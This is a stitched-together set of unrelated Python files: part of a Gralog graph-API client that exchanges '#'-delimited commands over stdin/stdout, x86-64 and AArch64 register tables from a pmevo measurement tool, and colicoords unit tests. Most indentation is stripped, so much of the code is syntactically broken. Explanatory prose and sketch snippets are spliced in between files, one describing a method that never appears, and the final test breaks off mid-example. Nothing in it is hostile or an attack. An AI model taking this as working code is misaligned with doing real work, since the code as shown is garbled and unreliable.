eid = sys.stdin.readline()
if eid != "\n": # it's possible that the edge cannot be added (e.g., a new selfloop)
e = Edge(self, eid)
self.id_to_edge[e.getId()] = e
return e
return None
def existsEdge(self, edge):
line = "existsEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
thereExistsAnEdge = sys.stdin.readline().rstrip()
return thereExistsAnEdge.lower() == "true"
def existsVertex(self, vertex):
line = "existsVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
thereExistsAVertex = sys.stdin.readline().rstrip()
return thereExistsAVertex.lower() == "true"
def deleteEdge(self, edge):
del self.id_to_edge[edge.getId()]
line = "deleteEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
def getAllEdgesBetween(self, vertexPair):
line = "getAllEdgesBetween#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(vertexPair)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
    # creates a random Erdős–Rényi graph with vertexCount vertices and edge probability p
    def generateRandomGraph(self, vertexCount, p):
        if not isinstance(vertexCount, int):
            gPrint("Cannot generate a random graph, wrong parameter: "
                   "vertex number must be an int.")
            return
        if vertexCount < 0:
            gPrint("Cannot generate a random graph, wrong parameter: "
                   "vertex number cannot be less than 0.")
            return
        if not isinstance(p, float) or p < 0 or p > 1.0:
            gPrint("Cannot generate a random graph, wrong parameter: "
                   "probability of an edge must be a float in [0,1].")
            return
        if vertexCount == 0:
            return
vertices = []
coordinates = dict()
for id in range(vertexCount):
coordinates[id] = (10*math.cos(2*id*math.pi/vertexCount),
10*math.sin(2*id*math.pi/vertexCount))
nxgraph = nx.fast_gnp_random_graph(vertexCount, p)
d = dict()
id = 0
for nxV in nxgraph.nodes():
d[id] = nxV
id += 1
nxEdges = nxgraph.edges()
id = 0
for x in range(vertexCount):
vertices.append(self.addVertex(id, coordinates[id]))
id += 1
for x in vertices:
for y in vertices:
if x.getId() < y.getId():
if (d[x.getId()], d[y.getId()]) in nxEdges:
x.connect(y)
    # end manipulating functions
# setter functions
# begin: best for private use!
def setVertexFillColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
line = "setVertexFillColor#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1):
try:
line = line + rgbFormatter(colorRGB)
except:
self.sendErrorToGralog("the rgb color: " + str(colorRGB).rstrip() + " is not properly formatted!")
else:
self.sendErrorToGralog("neither Hex nor RGB color specified!")
print(line.rstrip())
sys.stdout.flush()
def setVertexStrokeColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
# print("colorhex: " + str(colorHex))
line = "setVertexStrokeColor#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexCoordinates(self, vertex, coordinates):
line = "setVertexCoordinates#" + str(self.id).rstrip()+"#" + str(vertexId(vertex)).rstrip()
x = -1
y = -1
x = coordinates[0]
y = coordinates[1]
if x == None:
x = "empty"
if y == None:
y = "empty"
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
def setEdgeContour(self, edge, contour):
        line = "setEdgeContour#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + str(contour).rstrip()
print(line)
sys.stdout.flush()
def setEdgeColor(self, edge, colorHex=-1, colorRGB=-1):
line = "setEdgeColor#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#"
if not (colorHex == -1):
line = line + hexFormatter(colorHex)
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexRadius(self, vertex, newRadius):
self.setVertexDimension(vertex, newRadius, "radius")
def setVertexHeight(self, vertex, newHeight):
self.setVertexDimension(vertex, newHeight, "height")
def setVertexWidth(self, vertex, newWidth):
self.setVertexDimension(vertex, newWidth, "width")
def setVertexDimension(self, vertex, newDimension, dimension):
vertex = vertexId(vertex)
line = "setVertexDimension#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(newDimension).rstrip()+"#" + dimension.rstrip()
print(line.rstrip())
sys.stdout.flush()
def setVertexShape(self, vertex, shape):
vertex = vertexId(vertex)
line = "setVertexShape#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(shape).rstrip()
print(line.rstrip())
sys.stdout.flush()
def setEdgeWeight(self, edge, weight):
self.setEdgeProperty(edge, "weight", weight)
def setEdgeThickness(self, edge, thickness):
self.setEdgeProperty(edge, "thickness", thickness)
def setEdgeProperty(self, edge, propertyName, value):
line = "setEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setVertexProperty(self, vertex, propertyName, value):
line = "setVertexProperty#"+str(self.id).rstrip() + "#"
line = line + str(vertexId(vertex)).rstrip()
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setEdgeLabel(self, edge, label):
line = "setEdgeLabel#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + label
print(line.rstrip())
sys.stdout.flush()
def setVertexLabel(self, vertex, label):
vertex = vertexId(vertex)
line = "setVertexLabel#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + label
print(line.rstrip())
sys.stdout.flush()
# end: best for private use!
def setGraph(self, graphFormat, graphString = "hello_world"):
graphFormat = graphFormat.lower()
line = "setGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()+"#"
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$$\n"
line += graphString
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$\n"
print(line)
sys.stdout.flush()
# TODO: implement this
# end setter functions
# getter functions
def toIgraph(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ig = ig.Graph.Read_GraphML("tmp.graphml")
os.remove("tmp.graphml")
return g_ig
def toNx(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_nx = nx.read_graphml("tmp.graphml")
os.remove("tmp.graphml")
return g_nx
def toElementTree(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ET = ET.parse("tmp.graphml")
os.remove("tmp.graphml")
return g_ET
def toXml(self):
return self.getGraph("xml")
def getGraph(self, graphFormat):
# warning!! importing as pure TGF will mean edge id's will
# be lost. This will result in errors on the Gralog side.
line = "getGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()
print(line.rstrip())
i = 0
sys.stdout.flush()
line = sys.stdin.readline()
graphString = ""
if graphFormat.lower() == "tgf" or graphFormat.lower() == "gtgf":
tgf = graphFormat.lower() == "tgf"
multiline = False
first = False
if line[0] == line[1] == '$':
multiline = True
if tgf:
first = True
line = sys.stdin.readline()
hashtagSeen = False
if not multiline:
return graphString
while line[0] != '$':
# gPrint("line: " + line +" and line[0]: " + line[0] + " and line[0]!='$': " + str(line[0] != '$'))
graphString += line
if line[0] == '#':
hashtagSeen = True
else:
if not first:
if hashtagSeen:
if tgf:
self.edgifyTGFCommand(line)
else:
self.edgifyGTGFCommand(line)
else:
if tgf:
self.vertexifyTGFCommand(line)
else:
self.vertexifyGTGFCommand(line)
line = sys.stdin.readline()
i += 1
first = False
return graphString
if graphFormat.lower() == "xml":
return line
def getAllVertices(self):
# return: list of Vertex objects with id
line = "getAllVertices#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vertexIdStringList = (sys.stdin.readline()).split("#")
vertexList = []
for vertexIdString in vertexIdStringList:
if representsInt(vertexIdString):
v = self.getVertexOrNew(vertexIdString)
vertexList.append(v)
return vertexList
def getVertices(self):
return(self.getAllVertices())
def getAllEdges(self):
# return: list of fully sourced Edge objects with fully sourced endpoint Vertices
line = "getAllEdges#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
if len(endpointList) == 1 and endpointList[-1] == "\n":
endpointList = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdges(self):
return(self.getAllEdges())
# start: best for private use!
def getNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
neighbourIdStringList = (sys.stdin.readline()).split("#")
neighboursList = []
for neighbourIdString in neighbourIdStringList:
if representsInt(neighbourIdString):
v = self.getVertexOrNew(neighbourIdString)
neighboursList.append(v)
return neighboursList
def getOutgoingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getOutgoingNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
outgoingNeighbourIdStringList = (sys.stdin.readline()).split("#")
outgoingNeighboursList = []
for outgoingNeighbourIdString in outgoingNeighbourIdStringList:
if representsInt(outgoingNeighbourIdString):
v = self.getVertexOrNew(outgoingNeighbourIdString)
outgoingNeighboursList.append(v)
return outgoingNeighboursList
def getIncomingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getIncomingNeighbours#"+str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
incomingNeighbourIdStringList = (sys.stdin.readline()).split("#")
incomingNeighboursList = []
for incomingNeighbourIdString in incomingNeighbourIdStringList:
if representsInt(incomingNeighbourIdString):
v = self.getVertexOrNew(incomingNeighbourIdString)
incomingNeighboursList.append(v)
return incomingNeighboursList
def getIncidentEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncidentEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getAdjacentEdges(self, edge):
# return: list of Edge objects with id's only
line = "getAdjacentEdges#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getOutgoingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getOutgoingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getIncomingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncomingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdgeWeight(self, edge):
return self.getEdgeProperty(edge, "weight")
def getEdgeLabel(self, edge):
return self.getEdgeProperty(edge, "label")
def getEdgeProperty(self, edge, prop):
# internally: fill edge property dictionary
# return: String representing queried property
line = "getEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge.getProperty(prop)
def getVertexProperty(self, vertex, prop):
# internally: fill edge property dictionary
# return: String representing queried property
vid = vertexId(vertex)
line = "getVertexProperty#"+str(self.id).rstrip() + "#"
line = line + vid
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex.getProperty(prop)
# end: best use privately!
def requestVertex(self):
line = "requestVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestRandomVertex(self):
line = "requestRandomVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
    def requestEdge(self):
        line = "requestEdge#"+str(self.id).rstrip()
        print(line.rstrip())
        sys.stdout.flush()
        eid = sys.stdin.readline().rstrip()
        edge = self.getEdgeOrNew(eid)
        return edge
def requestRandomEdge(self):
line = "requestRandomEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(eid)
return edge
def requestInteger(self):
line = "requestInteger#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
i = sys.stdin.readline().rstrip()
return int(i)
def requestFloat(self):
line = "requestFloat#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
d = sys.stdin.readline().rstrip()
return float(d)
def requestString(self):
line = "requestString#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
st = sys.stdin.readline().rstrip()
return str(st)
# runtime changer functions
def pauseUntilSpacePressed(self, *args):
line = "pauseUntilSpacePressed"
rank = None
try:
rank = int(args[0])
        except (IndexError, ValueError, TypeError):
            pass
if len(args) > 0 and rank != None:
rank = int(args[0])
args = args[1:]
argString = ""
if rank != None:
argString += "#"+str(rank).rstrip()
        for key in sorted(self.variablesToTrack.keys()):
            term = "#(" + str(key).rstrip() + "=" + \
                str(self.variablesToTrack[key]).rstrip() + ")"
            argString = argString + term.rstrip()
for x in args:
if len(x) != 2:
argString = "#(syntax=pauseUntilSpacePressed((key, val)))"
break
if (type(x) == list):
for each in x:
term = "#("+"arrayyyy"+str(each[0])+"="+str(each[1])+")"
argString = argString + term
else:
term = "#("+str(x[0])+"="+str(x[1])+")"
argString = argString + term.rstrip()
line = line + argString
print(line)
sys.stdout.flush()
toSkip = sys.stdin.readline()
def track(self, name, var):
# ideally, something like this:
self.variablesToTrack[name] = var # if this is a pointer, it will work
# if it is an int or str, or some other non-reference type, it will not
def unTrack(self, name):
del self.variablesToTrack[name]
def sendMessage(self, toSend):
print(toSend)
sys.stdout.flush()
def message(self, message):
print("message#"+str(self.id).rstrip() + "#"+str(message).rstrip())
sys.stdout.flush()
def sendErrorToGralog(self, toSend):
print("error#"+str(self.id).rstrip() + "#"+str(toSend).rstrip())
sys.stdout.flush()
exit()
def mistakeLine(self):
print("wubbadubdub 3 men in a tub")
sys.stdout.flush()
sys.stdin.readline()
def pause(self, *args):
self.pauseUntilSpacePressed(*args)
# end runtime changer functions
def __str__(self):
vertices = [str(v) for v in self.id_to_vertex]
vertices.sort()
edges = [str(e) for e in self.getEdges()]
edges.sort()
return "VERTICES: " + " ".join(vertices) + "\nEDGES: " + " ".join(edges)
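Graph.castValueToType decodes the `val|type` pairs Gralog sends for vertex and edge properties. A standalone sketch of that scheme (the "vertex" case is omitted because it needs a live Graph; this assumes Gralog sends booleans as the literal text "true"/"false"):

```python
# Standalone sketch of the value-casting scheme used above.
def cast_value(val, typ):
    if typ == "float":
        return float(val)
    if typ == "int":
        return int(val)
    if typ == "bool":
        # bool("false") would be True, so compare the text instead
        return str(val).lower() == "true"
    return str(val) if typ == "string" else val

assert cast_value("2.5", "float") == 2.5
assert cast_value("false", "bool") is False
assert cast_value("abc", "unknown") == "abc"
```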
def gPrint(message):
if not message: # empty: print nothing except the new line (hacked with \t; <space> doesn't work)
print("gPrint#-1#" + "\t")
sys.stdout.flush()
else:
message = str(message)
lines = message.split('\n')
for line in lines:
print("gPrint#-1#" + line)
sys.stdout.flush()
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
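All of the Graph methods above talk to Gralog over stdout using '#'-separated command lines (command, graph id, then arguments). A hedged sketch of that wire format — the helper name is invented here for illustration and is not part of the API:

```python
# Illustrative builder for the '#'-separated command lines printed to Gralog.
def command_line(name, graph_id, *args):
    parts = [name, str(graph_id).rstrip()]
    parts += [str(a).rstrip() for a in args]
    return "#".join(parts)

assert command_line("setVertexLabel", 0, 3, "start") == "setVertexLabel#0#3#start"
assert command_line("getAllVertices", 1) == "getAllVertices#1"
```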
# --- vm_setup/pmevo/measurement-server/PITE/register_file.py ---
# (from qcjiang/pmevo-artifact, MIT license)
#! /usr/bin/env python3
# vim: et:ts=4:sw=4:fenc=utf-8
from abc import ABC, abstractmethod
from collections import defaultdict
import re
class RegisterFile(ABC):
registers = NotImplemented
def __init__(self):
# for each register kind an index pointing to the next register to use
self.reset_indices()
def reset_indices(self):
        self.next_indices = defaultdict(int)
def get_memory_base(self):
return self.registers["MEM"][0]["64"]
def get_div_register(self):
return self.registers["DIV"][0]["64"]
def get_clobber_list(self):
res = []
for k, v in self.registers.items():
for regset in v:
reg = regset["repr"]
if reg is not None:
res.append(reg)
return res
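get_clobber_list walks the whole register table and keeps only entries with a non-None "repr", so hardwired registers (memory base, divisor) never end up in the inline-asm clobber list. A toy table demonstrating the filter (the entries are an invented subset, not the real x86-64 table):

```python
# Toy register table exercising the clobber-list filter.
class TinyRegisterFile:
    registers = {
        "G": [{"64": "rbx", "repr": "rbx"},
              {"64": "rsi", "repr": "rsi"}],
        "MEM": [{"64": "r14", "repr": None}],  # hardwired base, not clobbered
    }

    def get_clobber_list(self):
        res = []
        for regsets in self.registers.values():
            for regset in regsets:
                if regset["repr"] is not None:
                    res.append(regset["repr"])
        return res

assert TinyRegisterFile().get_clobber_list() == ["rbx", "rsi"]
```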
class X86_64_RegisterFile(RegisterFile):
registers = {
"G": # general purpose registers
[
# {"64": "rax", "32": "eax", "repr": "rax"},
# {"64": "rcx", "32": "ecx", "repr": "rcx"},
# {"64": "rdx", "32": "edx", "repr": "rdx"},
{"64": "rbx", "32": "ebx", "repr": "rbx"}, # used by gcc
# {"64": "rsp", "32": "esp", "repr": "rsp"}, # used by gcc
# {"64": "rbp", "32": "ebp", "repr": "rbp"}, # used by gcc
{"64": "rsi", "32": "esi", "repr": "rsi"}, # used for string instructions
{"64": "rdi", "32": "edi", "repr": "rdi"}, # used for string instructions
{"64": "r8", "32": "r8d", "repr": "r8"},
{"64": "r9", "32": "r9d", "repr": "r9"},
{"64": "r10", "32": "r10d", "repr": "r10"},
{"64": "r11", "32": "r11d", "repr": "r11"},
{"64": "r12", "32": "r12d", "repr": "r12"},
# {"64": "r13", "32": "r13d", "repr": "r13"}, # used as divisor register
# {"64": "r14", "32": "r14d", "repr": "r14"}, # used as memory register
# {"64": "r15", "32": "r15d", "repr": "r15"}, # used by program frame
],
"V": # vector registers
[
{"256": "ymm0", "128": "xmm0", "repr": "ymm0"},
{"256": "ymm1", "128": "xmm1", "repr": "ymm1"},
{"256": "ymm2", "128": "xmm2", "repr": "ymm2"},
{"256": "ymm3", "128": "xmm3", "repr": "ymm3"},
{"256": "ymm4", "128": "xmm4", "repr": "ymm4"},
{"256": "ymm5", "128": "xmm5", "repr": "ymm5"},
{"256": "ymm6", "128": "xmm6", "repr": "ymm6"},
{"256": "ymm7", "128": "xmm7", "repr": "ymm7"},
{"256": "ymm8", "128": "xmm8", "repr": "ymm8"},
{"256": "ymm9", "128": "xmm9", "repr": "ymm9"},
{"256": "ymm10", "128": "xmm10", "repr": "ymm10"},
{"256": "ymm11", "128": "xmm11", "repr": "ymm11"},
{"256": "ymm12", "128": "xmm12", "repr": "ymm12"},
{"256": "ymm13", "128": "xmm13", "repr": "ymm13"},
{"256": "ymm14", "128": "xmm14", "repr": "ymm14"},
{"256": "ymm15", "128": "xmm15", "repr": "ymm15"},
],
"DIV": # register for non-zero divisor
[
{"64": "r13", "32": "r13d", "repr": None},
# no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
"MEM": # base register for memory operands
[
{"64": "r14", "32": "r14d", "repr": None}
# no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
}
def __init__(self):
super().__init__()
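next_indices keeps a per-kind cursor for handing out registers. The allocating method lies outside this excerpt, so the following is an assumption about its intended round-robin use, with an invented helper and a toy register list:

```python
# Assumed round-robin allocation driven by a per-kind index.
from collections import defaultdict

registers = {"G": ["rbx", "rsi", "rdi"]}  # toy subset, not the real table
next_indices = defaultdict(int)

def next_register(kind):
    regs = registers[kind]
    idx = next_indices[kind]
    next_indices[kind] = idx + 1
    return regs[idx % len(regs)]

assert [next_register("G") for _ in range(4)] == ["rbx", "rsi", "rdi", "rbx"]
```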
class AArch64_RegisterFile(RegisterFile):
registers = {
        "G": # general purpose registers
[
# {"64": "x0", "32": "w0", "repr": "x0"}, # used for frame
# {"64": "x1", "32": "w1", "repr": "x1"}, # used for frame
{"64": "x2", "32": "w2", "repr": "x2"},
{"64": "x3", "32": "w3", "repr": "x3"},
{"64": "x4", "32": "w4", "repr": "x4"},
{"64": "x5", "32": "w5", "repr": "x5"},
{"64": "x6", "32": "w6", "repr": "x6"},
{"64": "x7", "32": "w7", "repr": "x7"},
{"64": "x8", "32": "w8", "repr": "x8"},
{"64": "x9", "32": "w9", "repr": "x9"},
{"64": "x10", "32": "w10", "repr": "x10"},
{"64": "x11", "32": "w11", "repr": "x11"},
{"64": "x12", "32": "w12", "repr": "x12"},
{"64": "x13", "32": "w13", "repr": "x13"},
{"64": "x14", "32": "w14", "repr": "x14"},
{"64": "x15", "32": "w15", "repr": "x15"},
{"64": "x16", "32": "w16", "repr": "x16"},
{"64": "x17", "32": "w17", "repr": "x17"},
{"64": "x18", "32": "w18", "repr": "x18"},
{"64": "x19", "32": "w19", "repr": "x19"},
{"64": "x20", "32": "w20", "repr": "x20"},
{"64": "x21", "32": "w21", "repr": "x21"},
{"64": "x22", "32": "w22", "repr": "x22"},
{"64": "x23", "32": "w23", "repr": "x23"},
{"64": "x24", "32": "w24", "repr": "x24"},
{"64": "x25", "32": "w25", "repr": "x25"},
{"64": "x26", "32": "w26", "repr": "x26"},
{"64": "x27", "32": "w27", "repr": "x27"},
# {"64": "x28", "32": "w28", "repr": "x28"}, # used for memory
# {"64": "x29", "32": "w29", "repr": "x29"}, # used for divisor
# {"64": "x30", "32": "w30", "repr": "x30"}, # link register
# {"64": "x31", "32": "w31", "repr": "x31"}, # zero/sp register
],
"F": # vector/floating point registers
[
{"VEC": "v0", "128": "q0", "64": "d0", "32": "s0", "16": "h0", "8": "b0", "repr": "v0"},
{"VEC": "v1", "128": "q1", "64": "d1", "32": "s1", "16": "h1", "8": "b1", "repr": "v1"},
{"VEC": "v2", "128": "q2", "64": "d2", "32": "s2", "16": "h2", "8": "b2", "repr": "v2"},
{"VEC": "v3", "128": "q3", "64": "d3", "32": "s3", "16": "h3", "8": "b3", "repr": "v3"},
{"VEC": "v4", "128": "q4", "64": "d4", "32": "s4", "16": "h4", "8": "b4", "repr": "v4"},
{"VEC": "v5", "128": "q5", "64": "d5", "32": "s5", "16": "h5", "8": "b5", "repr": "v5"},
{"VEC": "v6", "128": "q6", "64": "d6", "32": "s6", "16": "h6", "8": "b6", "repr": "v6"},
{"VEC": "v7", "128": "q7", "64": "d7", "32": "s7", "16": "h7", "8": "b7", "repr": "v7"},
{"VEC": "v8", "128": "q8", "64": "d8", "32": "s8", "16": "h8", "8": "b8", "repr": "v8"},
{"VEC": "v9", "128": "q9", "64": "d9", "32": "s9", "16": "h9", "8": "b9", "repr": "v9"},
{"VEC": "v10", "128": "q10", "64": "d10", "32": "s10", "16": "h10", "8": "b10", "repr": "v10"},
{"VEC": "v11", "128": "q11", "64": "d11", "32": "s11", "16": "h11", "8": "b11", "repr": "v11"},
{"VEC": "v12", "128": "q12", "64": "d12", "32": "s12", "16": "h12", "8": "b12", "repr": "v12"},
{"VEC": "v13", "128": "q13", "64": "d13", "32": "s13", "16": "h13", "8": "b13", "repr": "v13"},
{"VEC": "v14", "128": "q14", "64": "d14", "32": "s14", "16": "h14", "8": "b14", "repr": "v14"},
{"VEC": "v15", "128": "q15", "64": "d15", "32": "s15", "16": "h15", "8": "b15", "repr": "v15"},
{"VEC": "v16", "128": "q16", "64": "d16", "32": "s16", "16": "h16", "8": "b16", "repr": "v16"},
{"VEC": "v17", "128": "q17", "64": "d17", "32": "s17", "16": "h17", "8": "b17", "repr": "v17"},
{"VEC": "v18", "128": "q18", "64": "d18", "32": "s18", "16": "h18", "8": "b18", "repr": "v18"},
{"VEC": "v19", "128": "q19", "64": "d19", "32": "s19", "16": "h19", "8": "b19", "repr": "v19"},
{"VEC": "v20", "128": "q20", "64": "d20", "32": "s20", "16": "h20", "8": "b20", "repr": "v20"},
{"VEC": "v21", "128": "q21", "64": "d21", "32": "s21", "16": "h21", "8": "b21", "repr": "v21"},
{"VEC": "v22", "128": "q22", "64": "d22", "32": "s22", "16": "h22", "8": "b22", "repr": "v22"},
{"VEC": "v23", "128": "q23", "64": "d23", "32": "s23", "16": "h23", "8": "b23", "repr": "v23"},
{"VEC": "v24", "128": "q24", "64": "d24", "32": "s24", "16": "h24", "8": "b24", "repr": "v24"},
{"VEC": "v25", "128": "q25", "64": "d25", "32": "s25", "16": "h25", "8": "b25", "repr": "v25"},
{"VEC": "v26", "128": "q26", "64": "d26", "32": "s26", "16": "h26", "8": "b26", "repr": "v26"},
{"VEC": "v27", "128": "q27", "64": "d27", "32": "s27", "16": "h27", "8": "b27", "repr": "v27"},
{"VEC": "v28", "128": "q28", "64": "d28", "32": "s28", "16": "h28", "8": "b28", "repr": "v28"},
{"VEC": "v29", "128": "q29", "64": "d29", "32": "s29", "16": "h29", "8": "b29", "repr": "v29"},
{"VEC": "v30", "128": "q30", "64": "d30", "32": "s30", "16": "h30", "8": "b30", "repr": "v30"},
{"VEC": "v31", "128": "q31", "64": "d31", "32": "s31", "16": "h31", "8": "b31", "repr": "v31"},
],
"DIV": # register for non-zero divisor
[
{"64": "x29", "32": "w29", "repr": None},
            # no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
"MEM": # base register for memory operands
[
{"64": "x28", "32": "w28", "repr": None},
            # no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
}
def __init__(self):
super().__init__()
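The tables above map each architectural register to its width-specific sub-register names, with `repr` giving the name used in clobber lists (`None` for the hardwired DIV/MEM registers). A minimal sketch of how such a table can be queried; the trimmed-down `registers` copy and the `pick` helper are illustrative only, not part of this module:

```python
# Illustrative subset of the AArch64 register table above (not the full class attribute).
registers = {
    "G": [
        {"64": "x2", "32": "w2", "repr": "x2"},
        {"64": "x3", "32": "w3", "repr": "x3"},
    ],
    "DIV": [{"64": "x29", "32": "w29", "repr": None}],
}

def pick(bank, index, width):
    """Return the sub-register name for a bank ("G", "DIV", ...), slot and bit width."""
    return registers[bank][index][width]

# Clobber list: every register with a non-None "repr" entry.
clobbers = [r["repr"] for bank in registers.values() for r in bank if r["repr"] is not None]
```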
import hashlib
import unittest
from colicoords.cell import Cell, CellList
from colicoords.preprocess import data_to_cells
from test import testcase
from test.test_functions import load_testdata
class DataTest(testcase.ArrayTestCase):
def setUp(self):
self.data = load_testdata('ds1')
def test_data_slicing(self):
sl1 = self.data[2:5, :, :]
self.assertEqual(sl1.shape, (3, 512, 512))
sl2 = self.data[:, 20:40, 100:200]
self.assertEqual(sl2.shape, (10, 20, 100))
def test_data_copy(self):
m0 = self.data.binary_img.mean()
data_copy = self.data.copy()
self.assertEqual(m0, self.data.binary_img.mean())
data_copy.data_dict['binary'] += 20
self.assertEqual(m0, self.data.binary_img.mean())
self.assertEqual(data_copy.binary_img.mean(), m0 + 20)
def _test_cell_list(self):
        # TODO: check order
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
d = self.data.copy()
print(d == self.data)
cl = CellList(cell_list)
self.assertEqual(len(cl), 48)
c5 = cl[5]
self.assertIsInstance(c5, Cell)
del cl[5]
self.assertEqual(len(cl), 47)
self.assertTrue(cl[3] in cl)
cl.append(c5)
self.assertTrue(c5 in cl)
vol = cl.volume
self.assertEqual(len(vol), 48)
class CellListTest(testcase.ArrayTestCase):
def setUp(self):
data = load_testdata('ds1')
self.cell_list = data_to_cells(data)
def test_slicing(self):
sliced = self.cell_list[:5]
self.assertIsInstance(sliced, CellList)
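The shape assertions in `test_data_slicing` follow plain NumPy slicing semantics on a (10, 512, 512) image stack; a self-contained sketch of the same checks, with a NumPy array standing in for the ColiCoords `Data` object:

```python
import numpy as np

# 10 frames of 512x512 pixels, as in the 'ds1' test data
data = np.zeros((10, 512, 512))

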